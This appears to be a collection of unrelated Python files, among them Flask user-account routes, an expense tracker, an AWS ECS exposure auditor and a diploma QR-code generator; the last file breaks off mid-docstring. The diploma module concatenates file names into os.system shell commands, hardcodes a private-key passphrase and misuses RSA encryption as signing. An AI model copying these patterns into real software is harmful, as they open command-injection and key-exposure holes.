if any([rq not in self.credentials for rq in self.required_credentials]):
raise CredentialError("Missing credentials.")
return sharepy.connect(
site=self.credentials["site"],
username=self.credentials["username"],
password=self.credentials["password"],
)
def download_file(
self,
download_from_path: str = None,
download_to_path: str = "Sharepoint_file.xlsm",
) -> None:
download_from_path = download_from_path or self.url
if not download_from_path:
raise ValueError("Missing required parameter 'download_from_path'.")
conn = self.get_connection()
conn.getfile(
url=download_from_path,
filename=download_to_path,
)
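# Minimal usage sketch (site, credentials and URLs are illustrative):
#
#   s = Sharepoint(
#       credentials={"site": "example.sharepoint.com",
#                    "username": "user@example.com",
#                    "password": "secret"},
#       download_from_path="https://example.sharepoint.com/sites/team/Shared%20Documents/report.xlsm",
#   )
#   s.download_file(download_to_path="report.xlsm")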
|
x = int(input())
z = int(input())
sum = int(0)
cake = x * z
while True:
piece = input()
if piece != "STOP":
piece = float(piece)
piece = int(piece)
sum += piece
if sum > cake:
print (f"No more cake left! You need {sum - cake} pieces more.")
break
if piece == "STOP":
if sum <= cake:
print (f"{cake - sum} pieces are left.")
break
else:
print (f"No more cake left! You need {sum - cake} pieces more.")
break
|
from flask import Blueprint, render_template, session, redirect, url_for, abort, request
import bcrypt
import os
from feed.forms import FeedPostForm
from settings import Config
from werkzeug.utils import secure_filename
import uuid
from user.decorators import login_required
from user.forms import RegisterForm, LoginForm, EditForm, ForgotForm, PasswordResetForm
from user.models import User
from feed.models import Message, Feed
from relationship.models import Relationship, RELATIONSHIP_TYPE, STATUS_TYPE, FRIENDS, PENDING, APPROVED, BLOCKED
from utils.commons import email
from utils.image_upload import thumbnail_process
user_blueprint = Blueprint('user_blueprint', __name__)
@user_blueprint.route('/')
def home():
if session.get('username'):
form = FeedPostForm()
user = User.getByName(session.get('username'))
feed_messages = Feed.get_feed(user.id)
return render_template('home/feed_home.html',
user=user,
form=form,
feed_messages=feed_messages
)
else:
return render_template('home/home.html')
@user_blueprint.route('/<username>/friends/<int:friends_page_number>', endpoint='profile-friends-page')
@user_blueprint.route('/<username>/friends', endpoint='profile-friends')
@user_blueprint.route('/profile/<string:username>')
def profile(username, friends_page_number=1):
logged_user = None
rel = None
friends_page = False
friends_per_page = 3
profile_messages = []
user = User.getByName(username)
if user:
if session['username']:
logged_user = User.getByName(session['username'])
rel = Relationship.get_relationship_status(logged_user.id, user.id)
# get user friends
friends_list = Relationship.get_friends(
user=logged_user.id,
rel_type=RELATIONSHIP_TYPE.get(FRIENDS),
status=STATUS_TYPE.get(APPROVED)
)
friends_total = len(friends_list)
if 'friends' in request.url:
friends_page = True
# pagination
limit = friends_per_page * friends_page_number
offset = limit - friends_per_page
if friends_total >= limit:
friends = friends_list[offset:limit]
else:
friends = friends_list[offset:friends_total]
else:
if friends_total >= 5:
friends = friends_list[:5]
else:
friends = friends_list
form = FeedPostForm()
if logged_user and (rel == "SAME" or rel == "FRIENDS_APPROVED"):
profile_messages = Message.getMessages(logged_user.id)
return render_template('user/profile.html',
user=user,
logged_user=logged_user,
rel=rel,
friends=friends,
friends_total=friends_total,
friends_page=friends_page,
form=form,
profile_messages=profile_messages
)
else:
abort(404)
@user_blueprint.route('/edit', methods=['POST', 'GET'])
@login_required
def edit():
error = None
message = None
user = User.getByName(session['username'])
if user:
form = EditForm(obj=user)
if form.validate_on_submit():
image_ts = None
if request.files.get('image'):
filename = secure_filename(form.image.data.filename)
folder_path = os.path.join(Config.UPLOAD_FOLDER, 'user_' + user.id)
file_path = os.path.join(folder_path, filename)
if not os.path.exists(folder_path):
os.makedirs(folder_path)
form.image.data.save(file_path)
image_ts = str(thumbnail_process(file_path, 'user_' + user.id, str(user.id)))
if user.username != form.username.data.lower():
if User.getByName(form.username.data.lower()):
error = "This username is already in use."
else:
session['username'] = form.username.data.lower()
user.username = form.username.data.lower()
if user.email != form.email.data.lower():
if User.getByEmail(form.email.data.lower()):
error = "This email is already in use."
else:
code = str(uuid.uuid4())
user.change_configuration = {
"new_email": form.email.data.lower(),
"confirmation_code": code
}
user.email_confirmation = False
message = "You will need to confirm the new email to complete this change"
# email the user
body_html = render_template('mail/user/change_email.html', user=user)
body_text = render_template('mail/user/change_email.txt', user=user)
email(user.change_configuration['new_email'], "Confirm your new email", body_html, body_text)
if not error:
form.populate_obj(user)
if image_ts:
user.profile_image = image_ts
user.update_record()
if message:
return redirect(url_for('.logout'))
else:
message = "Your info has been updated succefully ..!"
return render_template('user/edit.html', form=form, error=error, message=message, user=user)
else:
abort(404)
@user_blueprint.route('/logout', methods=['GET'])
def logout():
session['username'] = ''
return redirect(url_for('.login'))
@user_blueprint.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm()
error = None
if form.validate_on_submit():
user = User.getByName(form.username.data)
if user is None:
error = "Incorrect Credentials"
elif user.email_confirmation:
if bcrypt.hashpw(form.password.data, user.password) == user.password:
session['username'] = user.username
return redirect(url_for('.profile', username=user.username))
error = "Incorrect Credentials"
else:
error = "Check your email to complete your registration"
return render_template("user/login.html", form=form, error=error)
@user_blueprint.route('/register', methods=('GET', 'POST'))
def register():
form = RegisterForm()
message = None
if form.validate_on_submit():
salt = bcrypt.gensalt()
code = str(uuid.uuid4().hex)
hashed_password = bcrypt.hashpw(form.password.data, salt)
user = User(username=form.username.data,
password=hashed_password,
email=form.email.data,
first_name=form.first_name.data,
last_name=form.last_name.data,
bio=form.bio.data,
change_configuration={
"new_email": form.email.data.lower(),
"confirmation_code": code
})
user.save_database()
# send email
html_body = render_template('mail/user/register.html', user=user)
html_text = render_template('mail/user/register.txt', user=user)
email(user.change_configuration['new_email'], "Confirm your email", html_body, html_text)
message = "Please Check you email to complete registration."
return render_template('user/register.html', form=form, message=message)
return render_template('user/register.html', form=form, message=message)
@user_blueprint.route('/confirm/<string:username>/<string:code>', methods=('GET', 'POST'))
def confirm(username, code):
user = User.getByName(username)
if user and user.change_configuration and user.change_configuration.get("confirmation_code"):
if user.change_configuration.get("confirmation_code") == code:
user.email = user.change_configuration.get("new_email")
user.change_configuration = {}
user.email_confirmation = True
user.update_record()
return render_template('user/email_confirmed.html')
else:
abort(404)
@user_blueprint.route('/forgot', methods=['GET', 'POST'])
def forgot():
error = None
message = None
form = ForgotForm()
if form.validate_on_submit():
user = User.getByEmail(form.email.data)
if user:
code = str(uuid.uuid4().hex)
user.change_configuration = {
"password_reset_code": code,
}
user.update_record()
html_body = render_template('mail/user/password_reset.html', user=user)
html_text = render_template('mail/user/password_reset.txt', user=user)
email(user.email, "Password Reset Request", html_body, html_text)
message = "You will receive a password reset email if we find that email in our system"
return render_template('user/forgot.html', form=form, message=message, error=error)
# change password when you are not logged in -> from forgot password
@user_blueprint.route('/password_reset/<string:username>/<string:code>', methods=['GET', 'POST'])
def password_reset(username, code):
require_current = None
message = None
form = PasswordResetForm()
user = User.getByName(username)
if not user or user.change_configuration.get('password_reset_code') != code:
abort(404)
if request.method == 'POST':
del form.current_password
if form.validate_on_submit():
if form.password.data == form.confirm.data:
salt = bcrypt.gensalt()
hashed_password = bcrypt.hashpw(form.password.data, salt)
user.password = hashed_password
user.change_configuration = {}
user.update_record()
if session.get('username'):
session['username'] = ''
return redirect(url_for('.password_reset_complete'))
return render_template('user/password_reset.html',
form=form,
message=message,
require_current=require_current,
username=username,
code=code
)
@user_blueprint.route('/password_reset_complete')
def password_reset_complete():
return render_template('user/password_change_confirmed.html')
# change password when you are logged in
@user_blueprint.route('/change_password', methods=['GET', 'POST'])
def change_password():
require_current = True
error = None
form = PasswordResetForm()
user = User.getByName(username=session.get('username'))
if not user:
abort(404)
if request.method == 'POST':
if form.validate_on_submit():
if bcrypt.hashpw(form.current_password.data, user.password) == user.password:
salt = bcrypt.gensalt()
hashed_password = bcrypt.hashpw(form.password.data, salt)
user.password = hashed_password
user.update_record()
# if user is logged in, log him out
if session.get('username'):
session.pop('username')
return redirect(url_for('.password_reset_complete')), 302
else:
error = "Incorrect password"
return render_template('user/password_reset.html',
form=form,
require_current=require_current,
error=error
)
|
"""*********************************************************************
* *
* Description: Implementing a python client for proxy list *
* Date: 12/05/2021 *
* Author: Marcos Vinicios da Silveira *
* *
************************************************************************
"""
import os
import re
import sys
from codecs import open
from setuptools import setup
from setuptools.command.test import test as TestCommand
BASE = os.path.abspath(os.path.dirname(__file__))
# 'setup.py publish' shortcut.
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist bdist_wheel')
os.system('twine upload dist/*')
sys.exit()
packages = ['proxy_list', 'tests']
requires = []
test_requirements = []
about = {}
with open(os.path.join(BASE, 'proxy_list', '__version__.py'), 'r', 'utf-8') as f:
exec(f.read(), about)
with open('README.md', 'r', 'utf-8') as f:
readme = f.read()
setup(
name=about['__title__'],
version=about['__version__'],
description=about['__description__'],
long_description=readme,
long_description_content_type='text/markdown',
author=about['__author__'],
author_email=about['__author_email__'],
url=about['__url__'],
packages=packages,
include_package_data=True,
python_requires=">=3.4",
install_requires=requires,
license=about['__license__'],
tests_require=test_requirements,
)
# end-of-file
|
import itertools
import time
from printer import GridPrinter
class SudokuSolver:
def __init__(self, grid):
self.grid = grid
self.grid_size = self.grid.size
self.counter = 0
self.time = 0
self.solutions = []
def __set(self, x, y, value):
self.counter += 1
self.grid[x][y] = value
def __find_candidates(self, x, y):
"""Find candidates for grid[x][y] by examining all its neighbours"""
candidates = [True] * 10
for x1, y1 in itertools.chain(
self.grid.get_row_coordinates(x),
self.grid.get_col_coordinates(y),
self.grid.get_box_coordinates(x, y)
):
candidates[self.grid[x1][y1] - 1] = False
return [i + 1 for i, candidate in enumerate(candidates) if candidate]
def __next_coordinate(self, x, y):
# loop back to front of next line at the end of each line
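# e.g. on a 9x9 grid, (x=3, y=8) -> (4, 0)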
return x + (y + 1) // self.grid_size, (y + 1) % self.grid_size
def __solve(self, x, y):
if x == self.grid_size:
self.solutions.append(self.grid.clone())
return
x1, y1 = self.__next_coordinate(x, y)
# if this is a known value, just go the next one
if self.grid[x][y] != 0:
return self.__solve(x1, y1)
# examine the row, column and box to find suitable candidates
# then go through that list one-by-one until the right one is found
candidates = self.__find_candidates(x, y)
for c in candidates:
self.__set(x, y, c)
if self.__solve(x1, y1):
return True
self.grid[x][y] = 0
def solve(self):
print('Crunching numbers...')
start = time.time()
self.__solve(0, 0)
self.time = time.time() - start
if not self.solutions:
print('No solutions found.')
elif len(self.solutions) > 1:
print(f'Invalid grid - {len(self.solutions)} solutions found.')
else:
print()
GridPrinter(self.solutions[0]).display()
print()
self.print_stats()
return self.solutions[0]
return None
def print_stats(self):
print('Values set: {}'.format(self.counter))
print('Time taken: {:.2f}s'.format(self.time))
|
from __future__ import print_function
from collections import OrderedDict
from json import loads
from re import sub
from flask import Flask, jsonify, request, Response
from flask.json import JSONEncoder
class Keyword(object):
def __init__(self, keyword, argument):
self.keyword = keyword
self.argument = argument
def __str__(self):
return "%s = %s" % (self.keyword, self.argument)
class FlexibleJsonEncoder(JSONEncoder):
def default(self, object_to_encode):
if isinstance(object_to_encode, Keyword):
return object_to_encode.argument
return object_to_encode
class Host(OrderedDict):
def __init__(self, name=None, **set_keywords):
OrderedDict.__init__(self)
self['host'] = Keyword('host', name)
for keyword, argument in set_keywords.items():
self[keyword.lower()] = Keyword(keyword, argument)
def __str__(self):
output = "%s\n" % self['host']
for keyword in [
internal_keyword
for internal_keyword
in self
if internal_keyword != 'host'
]:
output += " %s\n" % self[keyword]
output += '\n'
return output
class SshConfig(OrderedDict):
def __init__(self, file_path):
OrderedDict.__init__(self)
self.file_path = file_path
def __str__(self):
output = ''
for host in self:
output += "# %s\n%s" % (host, self[host])
return sub(r'\n+$', '\n', output)
app = Flask(__name__)
app.json_encoder = FlexibleJsonEncoder
config_file = SshConfig('some/file/path')
dummy_host = Host('fakehost', user='fakeuser')
dummy_host['hostname'] = Keyword('hostname', 'fakehostname')
dummy_host['port'] = Keyword('port', 9001)
config_file['host1'] = dummy_host
config_file['host2'] = dummy_host
@app.route('/hosts', methods=['GET'])
def get_hosts():
hosts = []
for host in config_file:
hosts.append(config_file[host])
return jsonify(hosts)
@app.route('/hosts', methods=['POST'])
def create_host():
new_host = Host(**request.json)
return jsonify(new_host)
@app.route('/config', methods=['GET'])
def get_config():
return jsonify(config_file)
@app.route('/config', methods=['POST'])
def create_config():
new_config = SshConfig('some/file/path')
return Response('It doesn\'t do anything yet', 200)
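# Minimal usage sketch (assumes the app is launched with `app.run()` or
# `flask run` on the default port; the curl calls are illustrative):
#
#   curl http://127.0.0.1:5000/hosts
#   curl http://127.0.0.1:5000/config
#   curl -X POST -H 'Content-Type: application/json' \
#        -d '{"name": "host3", "User": "me"}' http://127.0.0.1:5000/hosts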
|
import bcrypt
from datetime import datetime, timedelta
from sqlalchemy.exc import IntegrityError
from sqlalchemy import and_
from models import User, Category, Expense
def category_insert(session, category_title):
"""
Function to create category
:param session:
:param category_title:
:return: returns created category
"""
category = Category(title=category_title.upper())
session.add(category)
try:
session.commit()
except IntegrityError:
session.rollback()
category = get_category(session, category_title=category_title)
print(f"New category created with title: {category_title}")
return category
def expense_insert(
session, category_id, user_id, price, year=None, month=None, day=None
):
"""
Function to create expense
:param day: day
:param month: month
:param year: year
:param session: current db session
:param category_id: category id
:param user_id: user id
:param price: price of expense
:return: returns created expense
"""
if year and month and day:
expense_date = datetime(year, month, day)
expense = Expense(
category_id=category_id,
user_id=user_id,
price=price,
timestamp=expense_date,
)
else:
expense = Expense(category_id=category_id, user_id=user_id, price=price)
session.add(expense)
session.commit()
print("Expense inserted")
return expense
def user_insert(session, username, password1, password2):
"""
Function to create user
:param session: current db session
:param username: username
:param password1: password
:param password2: password to verify
:return: returns user if password verified and no user with same username
"""
password = verify_password(password1, password2)
if password:
user = User(username=username, password=password)
session.add(user)
try:
session.commit()
except IntegrityError:
session.rollback()
print("Username already taken. Please try other username.")
else:
print(f"User was created with username {username}")
return user
else:
print("Your passwords is not matching.")
def verify_password(password1, password2):
"""
Password verification function
:return: hashed password if verified else None
"""
if password1 == password2:
return bcrypt.hashpw(password1.encode("utf-8"), bcrypt.gensalt())
return None
def get_user(session, username, password):
"""
Private function to get users
:param session: current db session
:param username: username
:param password: password
:return: user if found, else None
"""
user = session.query(User).filter_by(username=username).first()
if user and bcrypt.checkpw(password.encode("utf-8"), user.password):
return user
return None
def get_category(session, category_title=None, category_id=None):
"""
Function to get category by id or title
:param session: current db session
:param category_title: category title
:param category_id: category id
:return: category or None if does not exist
"""
category = None
if category_title:
category = session.query(Category).filter_by(title=category_title).first()
elif category_id:
category = session.query(Category).filter_by(category_id=category_id).first()
return category
def get_categories(session):
"""
Function to get all categories
:param session: current db session
:return: category list
"""
print("ID\tCATEGORY TITLE")
categories = session.query(Category).all()
for category in categories:
print(f"{category.category_id}\t{category.title}")
return categories
def get_expenses_by_params(
session, user_id, category_id=None, year=None, month=None, day=None
):
"""
Function to get expenses by some params
:param session: current db session
:param user_id: user id
:param category_id: category id
:param year: year
:param month: month
:param day: day
:return: returns list of expenses
"""
if year and not month and not day:
expenses = get_expenses_by_year(session, user_id, year)
elif year and month and not day:
expenses = get_expenses_by_month(session, user_id, year, month)
elif year and month and day:
expenses = get_expenses_by_day(session, user_id, year, month, day)
elif category_id:
expenses = get_expenses_by_category(session, user_id, category_id)
else:
expenses = get_expenses_of_user(session, user_id)
return expenses
def get_expenses_by_year(session, user_id, year):
"""
Function to get expenses by year
:param session: current db session
:param user_id: user id
:param year: year
:return: returns list of expenses
"""
date_begin = datetime(year=year, month=1, day=1)
date_end = datetime(year=year + 1, month=1, day=1)
expenses = (
session.query(Expense)
.filter_by(user_id=user_id)
.filter(and_(Expense.timestamp >= date_begin, Expense.timestamp < date_end))
)
return expenses
def get_expenses_by_month(session, user_id, year, month):
"""
Function to get expenses by month
:param session: current db session
:param user_id: user id
:param year: year
:param month: month
:return: returns list of expenses
"""
date_begin = datetime(year=year, month=month, day=1)
# roll over to January of the next year when the month is December
date_end = datetime(year=year + 1, month=1, day=1) if month == 12 else datetime(year=year, month=month + 1, day=1)
expenses = (
session.query(Expense)
.filter_by(user_id=user_id)
.filter(and_(Expense.timestamp >= date_begin, Expense.timestamp < date_end))
)
return expenses
def get_expenses_by_day(session, user_id, year, month, day):
"""
Function to get expenses by day
:param session: current db session
:param user_id: user id
:param year: year
:param month: month
:param day: day
:return: returns list of expenses
"""
date_begin = datetime(year=year, month=month, day=day)
# timedelta handles month and year rollover on the last day of a month
date_end = date_begin + timedelta(days=1)
expenses = (
session.query(Expense)
.filter_by(user_id=user_id)
.filter(and_(Expense.timestamp >= date_begin, Expense.timestamp < date_end))
)
return expenses
def get_expenses_by_category(session, user_id, category_id):
"""
Function to get expenses by category
:param session: current db session
:param user_id: user id
:param category_id: category id
:return: returns list of expenses
"""
expenses = session.query(Expense).filter_by(
user_id=user_id, category_id=category_id
)
return expenses
def get_expenses_of_user(session, user_id):
"""
Function to get all expenses of user
:param session: current db session
:param user_id: user id
:return: returns list of expenses
"""
expenses = session.query(Expense).filter_by(user_id=user_id)
return expenses
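# Minimal usage sketch (assumes `session` is a SQLAlchemy Session bound to the
# models above; attribute names such as `user_id` follow the models module and
# are assumptions here):
#
#   user = user_insert(session, "alice", "secret", "secret")
#   food = category_insert(session, "food")
#   expense_insert(session, food.category_id, user.user_id, price=12.5)
#   for e in get_expenses_by_month(session, user.user_id, 2021, 5):
#       print(e.price, e.timestamp)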
|
import os
import base64
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import qrcode
from PIL import Image,ImageDraw,ImageFont
from shutil import copyfile
from src.stegano import *
from pyzbar import pyzbar
import time
from asn1crypto import tsp
path_parent = os.path.dirname(os.getcwd())
def encrypt_private_key(a_message, private_key):
encryptor = PKCS1_OAEP.new(private_key)
encrypted_msg = encryptor.encrypt(a_message.encode())
encoded_encrypted_msg = base64.b64encode(encrypted_msg)
return encoded_encrypted_msg
def verifie(encrypt_message):
with open(os.getcwd()+os.path.sep+'private'+os.path.sep+'key.pem','r') as f :
private_keys = RSA.importKey(f.read(),passphrase="keepbreathing")
return decrypt_public_key(encrypt_message,private_keys)
def decrypt_public_key(encoded_encrypted_msg, public_key):
encryptor = PKCS1_OAEP.new(public_key)
decoded_encrypted_msg = base64.b64decode(encoded_encrypted_msg)
decoded_decrypted_msg = encryptor.decrypt(decoded_encrypted_msg)
return decoded_decrypted_msg
def sign(token):
with open(os.getcwd()+os.path.sep+"cert"+os.path.sep+"cert.pem","r") as certif:
public_key = RSA.importKey(certif.read())
return encrypt_private_key(token,public_key)
def generate_qrcode(secret_data, path,id_diploma):
token = sign(secret_data)
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_H,
box_size=10,
border=4,
)
qr.add_data(token)
qr.make(fit=True)
img_qr = qr.make_image(fill_color="black", back_color="white").convert('RGB')
img_qr.save("qr_temp.png")
diploma = Image.open(path)
img_qr = Image.open("qr_temp.png")
img_qr.thumbnail((350,350))
qr_pos = (diploma.size[0]-360,diploma.size[1]-360)
diploma.paste(img_qr,qr_pos)
diploma.save(os.getcwd()+os.path.sep+"Diplomas"+os.path.sep+"diploma_"+str(id_diploma)+'.png')
def generate_unique_diploma(user,diploma):
"""print Name, diploma and years on diploma and make some steganography to
transform standard picture to a unique one"""
copyfile(os.getcwd()+os.path.sep+"assets"+os.path.sep+"empty_diploma.png","temp.png")
img = Image.open('temp.png')
ts = str(time.time())
#ts = timeStamp('temp.png')
#ts = ts[:ts.find('b"')]
#ts = ts.replace("<asn1crypto.core.OctetString ","")
secret_data= user.first_name+user.name+diploma.specialisation+user.school+str(diploma.graduation_years)+ts
ls =len(secret_data)
if ls < 64 :
for i in range(64-ls):
secret_data+='.'
empty_dip = Image.open("temp.png")
d = ImageDraw.Draw(empty_dip)
fnt = ImageFont.truetype(os.getcwd()+os.path.sep+'assets'+os.path.sep+'AlgerianRegular.ttf', 50)
pos_user = ((empty_dip.size[0]//2-200,empty_dip.size[1]//2-100))
pos_diploma=((empty_dip.size[0]//2-200,empty_dip.size[1]//2-50))
pos_years = ((empty_dip.size[0]//2-100,empty_dip.size[1]//2))
user_draw = user.first_name +' '+user.name
diploma_draw = diploma.specialisation +' '+user.school
d.text(pos_user,user_draw,fill=(0,0,0),font=fnt)
d.text(pos_diploma,diploma_draw,fill=(0,0,0),font=fnt)
d.text(pos_years,str(diploma.graduation_years),fill=(0,0,0),font=fnt)
empty_dip.save("ready_to_qr.png")
print('drawing done')
generate_qrcode(secret_data,'ready_to_qr.png',diploma._id)
img=Image.open(os.getcwd()+os.path.sep+"Diplomas"+os.path.sep+"diploma_"+str(diploma._id)+'.png')
cacher(img,secret_data)
img.save("Diplomas"+os.path.sep+"diploma_"+str(diploma._id)+'.png')
print('diploma_generated')
#cleaning temp file
os.remove("temp.png")
os.remove("ready_to_qr.png")
os.remove('qr_temp.png')
print('cleaning done')
def decrypt_img(filename):
diploma = Image.open(filename)
qr = pyzbar.decode(diploma)
encryp_me = qr[0].data.decode()
return [verifie(encryp_me).decode(),recuperer(diploma,64)]
def timeStamp(filename):
os.system('openssl ts -query -data '+filename+' -no_nonce -sha512 -cert -out '+filename+'.tsq' )
os.system('curl -H "Content-Type: application/timestamp-query" --data-binary '+'"@'+filename+'.tsq" '+'freetsa.org/tsr >'+filename+'.tsr')
with open(filename+'.tsr', 'rb') as f :
res = tsp.TimeStampResp.load(f.read())
token = res['time_stamp_token']
signed_data = token['content']
signer_infos = signed_data['signer_infos']
signer_info = signer_infos[0]
signed_attrs = signer_info['signed_attrs']
signature = signer_info['signature']
print(signed_attrs)
return str(signature)
|
import pandas as pd
import sys
import os
import argparse
import shutil
import datetime
import tldextract
import csv
import json
import pyfiglet
import random
from fnmatch import fnmatch
## custom functions
from utilities.helpers import (makedirs, clean_string, compress_text)
export_dir = "export"
url_data = "url_data"
# process arguments
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--export", dest="exp", default="current", help="Specify 'current' or 'all'.")
args = parser.parse_args()
whattodo = args.exp
if whattodo == "current":
pass
elif whattodo == "all":
pass
else:
sys.exit("Specify the type of export. '-e current' exports the latest urls; '-e all' exports all records.")
d = datetime.datetime.today()
year = d.strftime("%Y")
month = d.strftime("%m")
day = d.strftime("%d")
date_filename = year + "_" + month + "_" + day
# define dataframes
df_export = pd.DataFrame(columns=['url', 'initial_save', 'accessed_on', 'pdf', 'current', 'filename_full', 'full_count', 'filename_text', 'text_count', 'text_hash', 'filename_snippet', 'first', 'last', 'middle'])
## If we're running an export let's get it done and get out
makedirs(export_dir)
file_ext = "*.json"
for path, subdirs, files in os.walk(url_data):
for f in files:
if fnmatch(f,file_ext):
appdata = os.path.join(path,f)
with open(appdata) as input:
data = json.load(input)
try:
url = data['url']
except:
url = ""
try:
initial_save = data['first_saved']
except:
initial_save = ""
try:
accessed_on = data['accessed_on']
except:
accessed_on = ""
try:
pdf = data['run_pdf']
except:
pdf = ""
try:
current = data['current']
except:
current = ""
try:
filename_full = data['filename_full']
except:
filename_full = ""
try:
full_count = data['full_count']
except:
full_count = ""
try:
filename_text = data['filename_text']
except:
filename_text = ""
try:
text_count = data['text_count']
except:
text_count = ""
try:
text_hash = data['text_hash']
except:
text_hash = ""
try:
filename_snippet = data['filename_snippet']
except:
filename_snippet = ""
try:
first = data['first']
except:
first = ""
try:
last = data['last']
except:
last = ""
try:
middle = data['middle']
except:
middle = ""
export_obj = pd.Series([url, initial_save, accessed_on, pdf, current, filename_full, full_count, filename_text, text_count, text_hash, filename_snippet, first, last, middle], index=df_export.columns)
df_export = df_export.append(export_obj, ignore_index=True)
if whattodo == "current":
df_export = df_export[(df_export['current'] == "yes")]
else:
pass
export_out = export_dir + "/" + date_filename + "_" + whattodo + ".csv"
df_export.to_csv(export_out, encoding='utf-8', index=False)
print(f"Export written to {export_out}")
|
#!/usr/bin/python
import os, shutil, sys, getopt, json
from pprint import pprint
from jinja2 import Environment, FileSystemLoader
class Speaker:
name = ''
email = ''
def __init__(self, name, email):
self.name = name
self.email = email
def __repr__(self):
return "Speaker[name={}]".format(self.name)
class Feedback:
def __init__(self):
self.session = ''
self.speakers = []
self.speaker = []
self.technical = []
self.overall = []
def __repr__(self):
return "Feedback[session={}, speakers={}, speaker={}, technical={}, overall={}]".format(self.session, self.speakers, self.speaker, self.technical, self.overall)
def parse_feedback(feedback, sessions, speakers):
fs = []
for session_id in feedback:
fb = Feedback()
session = sessions[session_id]
if 'speakers' not in session:
continue
fb.session = session['name']
for speaker_id in session['speakers']:
speaker = speakers[speaker_id]
fb.speakers.append(Speaker(speaker['name'], ''))#speaker['email']))
for fb_key in feedback[session_id]:
fb.speaker.append(feedback[session_id][fb_key]['speaker'])
fb.technical.append(feedback[session_id][fb_key]['technical'])
fb.overall.append(feedback[session_id][fb_key]['overall'])
fs.append(fb)
return fs
def usage():
print("{}: Generates emails based on attendee feedback.".format(sys.argv[0]))
print("")
print("-i, --infile The exported json data from your Firebase instance")
print("-t, --template The email template file to use [default=\"./template.html\"")
print("-o, --outdir The output directory to write the emails to [default=\"./output\"")
def main(argv):
inputfile = ''
outputdir = './output'
template = './template.html'
try:
opts, args = getopt.getopt(argv, "i:t:o:", ["infile=", "template=", "outdir="])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("-i", "--infile"):
inputfile = arg
elif opt in ("-t", "--template"):
template = arg
elif opt in ("-o", "--outdir"):
outputdir = arg
# the input file can only be validated after the options have been parsed
if not inputfile:
usage()
sys.exit(2)
print("cleaning output dir: {}".format(outputdir))
if os.path.isfile(outputdir) or os.path.isdir(outputdir):
shutil.rmtree(outputdir)
os.mkdir(outputdir)
j2_env = Environment(loader=FileSystemLoader(os.getcwd()),
trim_blocks=True)
template = j2_env.get_template(template)
with open(inputfile) as file:
data = json.load(file)
for session_id in data['feedback']:
session = data['sessions'][session_id]
if 'speakers' not in session:
continue
for speaker_id in session['speakers']:
fbs = data['feedback'][session_id].values()
averages = {
'speaker': 0,
'technical': 0,
'overall': 0
}
for fb in fbs:
averages['speaker'] += fb['speaker']
averages['technical'] += fb['technical']
averages['overall'] += fb['overall']
averages['speaker'] /= len(fbs)
averages['technical'] /= len(fbs)
averages['overall'] /= len(fbs)
email = template.render(speaker=data['speakers'][speaker_id], session=session, averages=averages, feedback=data['feedback'][session_id].values())
with open(os.path.join(outputdir, "{}-{}.html".format(speaker_id, session_id)), "w", encoding="utf-8") as f:
    f.write(email)
print("wrote {}-{} email".format(speaker_id, session_id))
if __name__ == "__main__":
main(sys.argv[1:])
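# Example invocation (file names are hypothetical; -i is required, -t and -o fall back to their defaults):
#   python generate_feedback_emails.py -i firebase-export.json -t template.html -o output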
|
import json
from shared import get_session_for_account, fetch_all_accounts, send_notification
from policyuniverse.policy import Policy
from policyuniverse.statement import Statement
def audit(resource, remediate=False):
is_compliant = True
if resource["type"] != "ecs_service":
raise Exception(
"Mismatched type. Expected {} but received {}".format(
"ecs_service", resource["type"]
)
)
# Get a session in the account where this resource is
ecs = get_session_for_account(resource["account"], resource["region"], "ecs")
ecs_is_public = False
try:
## List all ECS Clusters
ecs_clusters = ecs.list_clusters()
## Now get all cluster ARNs from ECS clusters json
cluster_arns = ecs_clusters["clusterArns"]
## For each cluster, try to find the named service
ecs_description = []
service_cluster = ""
for cluster in cluster_arns:
svc_description = ecs.describe_services(
cluster = cluster,
services = [resource["id"]]
)
## If the services array contains an object then set ecs_description to the services array of the cluster
## Set cluster variable to the cluster ARN
if len(svc_description['services']) > 0:
ecs_description = svc_description['services']
service_cluster = cluster
for ecs_svc in ecs_description:
if ecs_svc['networkConfiguration']['awsvpcConfiguration']['assignPublicIp'] == 'ENABLED':
ecs_is_public = True
except Exception as e:
print(e)
print("No ECS Services Definition: {}".format(resource["id"]))
if ecs_is_public:
is_compliant = False
issue = "ECS {} is public via Public IP".format(resource["id"])
if remediate:
for ecs_svc in ecs_description:
is_compliant = remediation_make_ecs_private(resource, ecs, service_cluster,ecs_svc['networkConfiguration']['awsvpcConfiguration'])
if not is_compliant:
issue += " - Not remediated"
send_notification(issue, "", resource)
if is_compliant:
print("ECS is private: {}".format(resource["id"]))
return is_compliant
def remediation_make_ecs_private(resource, ecs, cluster, networkConfiguration):
try:
ecs.update_service(
cluster= cluster,
service = resource['id'],
forceNewDeployment=True,
networkConfiguration = {
'awsvpcConfiguration': {
'subnets': networkConfiguration['subnets'],
'securityGroups': networkConfiguration['securityGroups'],
'assignPublicIp':'DISABLED'
}
}
)
except Exception as e:
print(e)
return False
return True
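# Minimal usage sketch, assuming the resource payload produced by the surrounding tooling
# carries the fields read above (type, id, account, region). Values below are hypothetical.
if __name__ == "__main__":
    sample_resource = {
        "type": "ecs_service",
        "id": "my-ecs-service",          # hypothetical service name
        "account": "123456789012",       # hypothetical account id
        "region": "us-east-1",
    }
    # Report only; pass remediate=True to also flip assignPublicIp to DISABLED.
    audit(sample_resource, remediate=False)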
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""LSTM projection cell with cell clip and projection clip."""
__all__ = ['LSTMPCellWithClip']
from mxnet.gluon.contrib.rnn import LSTMPCell
class LSTMPCellWithClip(LSTMPCell):
r"""Long-Short Term Memory Projected (LSTMP) network cell with cell clip and projection clip.
Each call computes the following function:
.. math::
\DeclareMathOperator{\sigmoid}{sigmoid}
\begin{array}{ll}
